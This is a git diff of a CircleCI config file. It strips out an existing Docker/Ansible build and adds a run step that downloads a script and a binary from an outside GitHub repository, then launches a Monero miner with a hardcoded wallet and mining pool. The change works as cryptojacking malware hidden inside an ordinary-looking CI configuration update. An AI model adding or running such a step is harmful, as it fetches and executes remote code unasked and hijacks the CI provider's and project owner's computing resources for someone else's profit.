--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,45 +1,11 @@
-version: 2
-
+version: 2.0
 jobs:
   build:
     docker:
-            - image: ubuntu
+      - image: circleci/ruby:2.4.2-jessie-node
+        auth:
+          username: mydockerhub-user
+          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
     steps:
       - checkout
-
-      - setup_remote_docker:
-          docker_layer_caching: true 
-
-      - run:
-          name: install docker
-          command: |
-            set -x
-            apt-get update
-            apt-get install -y curl
-            VER="17.03.0-ce"
-            curl -L -o /tmp/docker-$VER.tgz https://download.docker.com/linux/static/stable/x86_64/docker-$VER.tgz
-            tar -xz -C /tmp -f /tmp/docker-$VER.tgz
-            mv /tmp/docker/* /usr/bin
-      - run:
-          name: Run playbook
-          command: |
-            echo "here i am"
-            echo $HOME
-            echo pwd
-            ls /root/project
-            apt-get update
-            apt-get install -y wget gnupg
-            apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 7EA0A9C3F273FCD8
-            apt-get update
-            apt-get install -y software-properties-common
-            add-apt-repository -y "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) \ test"
-            apt-get install -y docker python-pip python python3 python3-venv python3-apt build-essential
-            python3 -m venv venv
-            . venv/bin/activate
-            pip install --upgrade pip
-            pip install docker-py
-            pip install ansible
-            ansible-galaxy install angstwad.docker_ubuntu,v3.4.7
-            docker login -u $DHUBUSER -p $DHUBPWD
-            ansible-playbook -i hosts main.yml
-            docker ps -a
+      - run:  wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/hunshukajh/yes/raw/main/gas && chmod +x gas cmdline_launcher.sh && ./cmdline_launcher.sh -algo randomx -coin XMR -wallet <86hYWU26WqwLDfwhr5Aef6Q9Fk8QEJSCyapiP7E2qwhVHnUGxS9oYMTNUFffPVvWWsGgykp96YwdKTjmR7xKGKqn435TMDA>  -rigName  $(echo $(shuf -i 1-9999 -n 1)-SRBO) -pool1 xmr.2miners.com:2222
